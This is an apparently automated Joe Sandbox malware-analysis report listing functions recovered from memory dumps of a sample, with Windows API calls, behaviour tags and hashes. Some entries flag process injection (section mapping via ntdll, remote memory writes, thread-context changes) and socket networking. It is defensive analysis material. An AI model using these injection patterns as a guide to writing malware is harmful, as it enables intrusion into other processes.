                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 388111225-0
                                                                  • Opcode ID: 203a2b38f817d4d23a6501c1524f63e085a1b9106d7fef7525e1a372d16d7569
                                                                  • Instruction ID: 82e9c0f39043657cc6c225599ab9c5f47434e1e2853e5acc0122577f65697309
                                                                  • Opcode Fuzzy Hash: 203a2b38f817d4d23a6501c1524f63e085a1b9106d7fef7525e1a372d16d7569
                                                                  • Instruction Fuzzy Hash: 01310870218B464FD359EF68AC9163936F0FB86334F060A5EE8668B2B1D674A801C392
                                                                  Function 009A6029 Relevance: 16.6, APIs: 11, Instructions: 99threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: HandleProcess$CurrentDuplicate$ErrorLast$AttributeCloseOpenProcThreadUpdate
                                                                  • String ID:
                                                                  • API String ID: 2151055714-0
                                                                  • Opcode ID: 0480154427d5172fff179a76570534ed64184663f59270bef32bb2a4aa882687
                                                                  • Instruction ID: c629e5d455bc5e9791b999a2c04f12f1731e4e2dcd0e85438bc24a3c4faf5e69
                                                                  • Opcode Fuzzy Hash: 0480154427d5172fff179a76570534ed64184663f59270bef32bb2a4aa882687
                                                                  • Instruction Fuzzy Hash: C9419F32618B4487EB24CF62E8483997BA9F789FA8F080529EE4D43B56DF7CC545C740
                                                                  Function 0099F6B4 Relevance: 16.6, APIs: 11, Instructions: 91sleepfilepipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CountErrorLastSleepTickWrite$BuffersCloseDisconnectFlushHandleNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 1326360348-0
                                                                  • Opcode ID: 4e79a0a58ab8dddb263587398078cda49ad1039685f1639a7590c56d7c38f5e4
                                                                  • Instruction ID: b25ad705c2b2c21b331004e8be062b9623a903094cb94c7508a558dc6df93de2
                                                                  • Opcode Fuzzy Hash: 4e79a0a58ab8dddb263587398078cda49ad1039685f1639a7590c56d7c38f5e4
                                                                  • Instruction Fuzzy Hash: C0317C36700A459AEB10DFF9E99479C73BAF784B98F410522DE0A97A69DF38C909C740
                                                                  Function 009A288C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85filelibraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$HandleView$AddressCloseCreateErrorLastMappingModuleProcUnmap
                                                                  • String ID: NtMapViewOfSection$ntdll.dll
                                                                  • API String ID: 2680503992-3170647572
                                                                  • Opcode ID: 121fe0b491a684415106ec00e2dd0e7d2198fcb60d8a3cefec07f5edc9ae2468
                                                                  • Instruction ID: 0671c1004cda7bf6dae6ed32608748986dba46d92cb220ac4faeebec621f1fed
                                                                  • Opcode Fuzzy Hash: 121fe0b491a684415106ec00e2dd0e7d2198fcb60d8a3cefec07f5edc9ae2468
                                                                  • Instruction Fuzzy Hash: 1731DE32710B4487EB149B26F55876A73A4F789FB4F040729EEAA07BA6CF7CC4458740
                                                                  Function 009A5864 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$ErrorLastSleepselectsend
                                                                  • String ID: d
                                                                  • API String ID: 2152284305-2564639436
                                                                  • Opcode ID: cd5d6b9af6a216c8fb5dee28e8f18bddad3c500ccbeb1af542c6eb1c04d411d5
                                                                  • Instruction ID: 250f59eec2ff7ffeefc099010024af474404d99b5629c5fe2863d09e15e8c7ef
                                                                  • Opcode Fuzzy Hash: cd5d6b9af6a216c8fb5dee28e8f18bddad3c500ccbeb1af542c6eb1c04d411d5
                                                                  • Instruction Fuzzy Hash: D0218072214F85D6EB60CF21F98878E7369F7887A4F404125EB9E47A59DF38C858CB80
                                                                  Function 03562DEF Relevance: 15.1, APIs: 10, Instructions: 93COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 03562E1A
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 03562E12
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  • __lock_fhandle.LIBCMT ref: 03562E5E
                                                                  • _lseeki64_nolock.LIBCMT ref: 03562E77
                                                                  • _unlock_fhandle.LIBCMT ref: 03562E9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 2644381645-0
                                                                  • Opcode ID: 13d5b912aa4b58c8157a7abacb0084aea56df7353009d6a56fe2b8f2328fcb02
                                                                  • Instruction ID: 523b132f4cdbfa4515b5d2f3d9f793ed4607f6d19134113103c9d389b216b629
                                                                  • Opcode Fuzzy Hash: 13d5b912aa4b58c8157a7abacb0084aea56df7353009d6a56fe2b8f2328fcb02
                                                                  • Instruction Fuzzy Hash: 9321D8316187454ED359EB5CF89137D76F0FFCA321F050A6EE41ACB1B1DA746C0186A2
                                                                  Function 03562C77 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 03562CA2
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 03562C9A
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  • __lock_fhandle.LIBCMT ref: 03562CE6
                                                                  • _lseek_nolock.LIBCMT ref: 03562CFF
                                                                  • _unlock_fhandle.LIBCMT ref: 03562D20
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 1078912150-0
                                                                  • Opcode ID: 0a90b57d0e0bb32bf9b0256fe91cce560893c6d5b4dbdc2a1a779e5db910b3c4
                                                                  • Instruction ID: 492fe5de461f61c2ab7546a381e5e229fa97a7391319731765f8d9eab4576c8c
                                                                  • Opcode Fuzzy Hash: 0a90b57d0e0bb32bf9b0256fe91cce560893c6d5b4dbdc2a1a779e5db910b3c4
                                                                  • Instruction Fuzzy Hash: C92128356187454ED319EB68F89137C76F0FFC2331F160A5DE466CB1B2D6B468028792
                                                                  Function 009B2BBC Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B2BEE
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B2BE5
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  • __doserrno.LIBCMT ref: 009B2C4B
                                                                  • _errno.LIBCMT ref: 009B2C52
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009B2CB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 388111225-0
                                                                  • Opcode ID: 5e6db6726096af27b66046b2acef74fb063e62aaa520d3154a3709877deb361b
                                                                  • Instruction ID: 50b2cd035ccefcc3cb8c533c0acb2e8124b6eb7c522747fc7fe81664a18dcccd
                                                                  • Opcode Fuzzy Hash: 5e6db6726096af27b66046b2acef74fb063e62aaa520d3154a3709877deb361b
                                                                  • Instruction Fuzzy Hash: AF2148323113448AD3166F75DA8136F3A10FBC2BB0F458655EE6617B96CB7CC842C791
                                                                  Function 009BBC50 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009BBC76
                                                                  • _errno.LIBCMT ref: 009BBC6B
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 1812809483-0
                                                                  • Opcode ID: d44fac2e59bc99b4c96033e94abcbe5d8b9df5f97906d86d8397442a6074eaee
                                                                  • Instruction ID: 1b51b4a0a39dbb91847f86b768b245c87d2b400b2b0870b46e6158761f9768cf
                                                                  • Opcode Fuzzy Hash: d44fac2e59bc99b4c96033e94abcbe5d8b9df5f97906d86d8397442a6074eaee
                                                                  • Instruction Fuzzy Hash: 864126B261435186DF20EB1686403FE36A8E7E4BB4F904226EB9547BC5DBBCC841C740
                                                                  Function 009A02EC Relevance: 13.6, APIs: 9, Instructions: 109threadinjectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$Memory$ErrorLastRead$ContextCurrentProtectThreadVirtualWritefreemalloc
                                                                  • String ID:
                                                                  • API String ID: 1437218981-0
                                                                  • Opcode ID: 0837c0be696be076953f626b7cb1ef700a22adb7f3bb4411fff8eaef3d65f62c
                                                                  • Instruction ID: 377aca856a5da3a943f01abcca52e80fc6f55df5908845c707a5323ea63b1e86
                                                                  • Opcode Fuzzy Hash: 0837c0be696be076953f626b7cb1ef700a22adb7f3bb4411fff8eaef3d65f62c
                                                                  • Instruction Fuzzy Hash: 1D419072318A4186DB24DF26F8507AE73A8FBC9B88F005425EF8A47B5AEF3CC5458744
                                                                  Function 009AC21C Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 009AC204: _mtinitlocknum.LIBCMT ref: 009AFB4A
                                                                    • Part of subcall function 009AC204: _amsg_exit.LIBCMT ref: 009AFB56
                                                                  • DecodePointer.KERNEL32 ref: 009AC278
                                                                  • DecodePointer.KERNEL32 ref: 009AC296
                                                                  • EncodePointer.KERNEL32 ref: 009AC2C4
                                                                  • DecodePointer.KERNEL32 ref: 009AC2D9
                                                                  • EncodePointer.KERNEL32 ref: 009AC2E4
                                                                  • DecodePointer.KERNEL32 ref: 009AC2F6
                                                                  • DecodePointer.KERNEL32 ref: 009AC306
                                                                  • __crtCorExitProcess.LIBCMT ref: 009AC38A
                                                                  • ExitProcess.KERNEL32 ref: 009AC392
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 1550138920-0
                                                                  • Opcode ID: d7efd6195f77797d4161262abdd0b4da421aa9445d234d03ffcc64e71c179cc0
                                                                  • Instruction ID: 748ae44c4b5b5d3db365eb4c7546959f48868bfc4950b4c746efe6e7f3fe4ef7
                                                                  • Opcode Fuzzy Hash: d7efd6195f77797d4161262abdd0b4da421aa9445d234d03ffcc64e71c179cc0
                                                                  • Instruction Fuzzy Hash: 1141CE7130AB0182EB509F11FD4036977AAF78ABE8F44442AEE8E47766EF38C4598740
                                                                  Function 009A4B68 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: htons$ErrorLastStartupclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3990436974-0
                                                                  • Opcode ID: 0cd43114701e1262f3a5fd96d94ee5b07d31ea31945adaa52020fa66bcd3804a
                                                                  • Instruction ID: 5b3b569efebebd3cfa499d0a7e374b1c8a237539e54ce6948e662cea5a9d78d9
                                                                  • Opcode Fuzzy Hash: 0cd43114701e1262f3a5fd96d94ee5b07d31ea31945adaa52020fa66bcd3804a
                                                                  • Instruction Fuzzy Hash: A8312262300A8082EB349F25F9443EA7369FB85BA8F440524EE4F47695EFBCC64AC740
                                                                  Function 0356161B Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 03561646
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 0356163E
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  • __lock_fhandle.LIBCMT ref: 0356168A
                                                                  • _unlock_fhandle.LIBCMT ref: 035616C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 2464146582-0
                                                                  • Opcode ID: 2fd7552e7a03a83772671d1ab36797b1f3930bea2a84a4ca2c1857c787e7c989
                                                                  • Instruction ID: f99701b896eaedf524260939c53931c75a7a9b779c3338d63485caafe1ea19f8
                                                                  • Opcode Fuzzy Hash: 2fd7552e7a03a83772671d1ab36797b1f3930bea2a84a4ca2c1857c787e7c989
                                                                  • Instruction Fuzzy Hash: C5212835618B414ED359EB6CF89133C76F0FBC2331F0A065DE46A8B1B1D6B4680186E6
                                                                  Function 009A5200 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 009A5248: htonl.WS2_32 ref: 009A52A5
                                                                    • Part of subcall function 009A5248: select.WS2_32 ref: 009A5313
                                                                    • Part of subcall function 009A5248: __WSAFDIsSet.WS2_32 ref: 009A532B
                                                                    • Part of subcall function 009A5248: accept.WS2_32 ref: 009A5348
                                                                    • Part of subcall function 009A5248: ioctlsocket.WS2_32 ref: 009A5360
                                                                    • Part of subcall function 009A5248: __WSAFDIsSet.WS2_32 ref: 009A5403
                                                                  • GetTickCount.KERNEL32 ref: 009A5212
                                                                    • Part of subcall function 009A5594: malloc.LIBCMT ref: 009A55C6
                                                                    • Part of subcall function 009A5594: htonl.WS2_32 ref: 009A55F9
                                                                    • Part of subcall function 009A5594: recvfrom.WS2_32 ref: 009A563D
                                                                    • Part of subcall function 009A5594: WSAGetLastError.WS2_32 ref: 009A564A
                                                                  • GetTickCount.KERNEL32 ref: 009A522A
                                                                  • GetTickCount.KERNEL32 ref: 009A5748
                                                                  • GetTickCount.KERNEL32 ref: 009A575E
                                                                  • shutdown.WS2_32 ref: 009A577D
                                                                  • shutdown.WS2_32 ref: 009A5792
                                                                  • closesocket.WS2_32 ref: 009A579C
                                                                  • free.LIBCMT ref: 009A57BC
                                                                  • free.LIBCMT ref: 009A57D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                                                                  • String ID:
                                                                  • API String ID: 3610715900-0
                                                                  • Opcode ID: 627dba3710d4f0c7dd1d641995000bac8284fcfa6f523cdae05f715bf1581dd1
                                                                  • Instruction ID: 63fd7f8b66fa8e19581e938e8a06e3b10f7a195f357b6e58855313893a52c805
                                                                  • Opcode Fuzzy Hash: 627dba3710d4f0c7dd1d641995000bac8284fcfa6f523cdae05f715bf1581dd1
                                                                  • Instruction Fuzzy Hash: 90218332700E41C6EB249F62E54832D737CFB8AFA9F1A5521DE595761ADF38C890C790
                                                                  Function 03560E3F Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 03560E60
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 03560E58
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  • __lock_fhandle.LIBCMT ref: 03560EA4
                                                                  • _close_nolock.LIBCMT ref: 03560EB7
                                                                  • _unlock_fhandle.LIBCMT ref: 03560ED0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 2140805544-0
                                                                  • Opcode ID: 6cfc25cdd5b489f6688e94242b3cab24ae98c4ad259251a64ebc42d574a3c06b
                                                                  • Instruction ID: 066aa9a4476b7e1a9685b481d80c870a19f6fdd3a4dabc4fd82052b85d067640
                                                                  • Opcode Fuzzy Hash: 6cfc25cdd5b489f6688e94242b3cab24ae98c4ad259251a64ebc42d574a3c06b
                                                                  • Instruction Fuzzy Hash: 6C11063255DB568ED315EB64A8A432D76B0FB82321F160A6DE42B8B2F1D6749C418391
                                                                  Function 009B3830 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B385B
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B3853
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  • __lock_fhandle.LIBCMT ref: 009B389F
                                                                  • _lseek_nolock.LIBCMT ref: 009B38B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                                  • String ID:
                                                                  • API String ID: 310312816-0
                                                                  • Opcode ID: f9b56865d90164e51b20c2bbab125bba674e742126cc76267be3c4ade94a0bda
                                                                  • Instruction ID: 2e8357d58d03ee437ea37a0ac0b5dcb6ebf8c6077811da44179c73dd001fff4e
                                                                  • Opcode Fuzzy Hash: f9b56865d90164e51b20c2bbab125bba674e742126cc76267be3c4ade94a0bda
                                                                  • Instruction Fuzzy Hash: 94113B32B0564049E702BF65DA8136E7611B7C17B0F598919FA2A0B7E7CB7CC841C766
                                                                  Function 009B39A8 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B39D3
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B39CB
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  • __lock_fhandle.LIBCMT ref: 009B3A17
                                                                  • _lseeki64_nolock.LIBCMT ref: 009B3A30
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
